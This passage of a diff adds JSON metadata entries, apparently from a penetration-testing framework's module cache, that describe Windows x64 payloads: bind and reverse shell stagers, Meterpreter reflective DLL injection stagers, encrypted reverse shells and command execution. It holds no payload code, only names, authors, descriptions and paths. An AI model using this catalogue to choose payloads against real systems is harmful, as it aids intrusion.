"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/x64/custom/bind_ipv6_tcp": { + "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/custom/bind_ipv6_tcp_uuid": { + "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/custom/bind_named_pipe": { + "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "UserExistsError" + ], + "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/custom/bind_tcp": { + "name": "Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/custom/bind_tcp_rc4": { + "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/custom/bind_tcp_uuid": { + "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/custom/reverse_http": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/custom/reverse_https": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/custom/reverse_named_pipe": { + "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/custom/reverse_tcp": { + "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/custom/reverse_tcp_rc4": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/custom/reverse_tcp_uuid": { + "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/custom/reverse_winhttp": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/custom/reverse_winhttps": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_windows/x64/encrypted_shell/reverse_tcp": { + "name": "Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matt Graeber", + "Shelby Pace" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_windows/x64/encrypted_shell_reverse_tcp": { + "name": "Windows Encrypted Reverse Shell", + "fullname": "payload/windows/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matt Graeber", + "Shelby Pace" + ], + "description": "Connect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/exec": { + "name": "Windows x64 Execute Command", + "fullname": "payload/windows/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Execute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/exec.rb", + "is_install_path": true, + "ref_name": "windows/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/loadlibrary": { + "name": "Windows x64 LoadLibrary Path", + "fullname": "payload/windows/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie", + "sf " + ], + "description": "Load an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", + "is_install_path": true, + "ref_name": "windows/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/messagebox": { + "name": "Windows MessageBox x64", + "fullname": "payload/windows/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "pasta " + ], + "description": "Spawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/messagebox.rb", + "is_install_path": true, + "ref_name": "windows/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/meterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/meterpreter/bind_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/meterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/meterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/meterpreter/reverse_http": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/meterpreter/reverse_https": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/meterpreter/reverse_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/meterpreter/reverse_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/meterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the 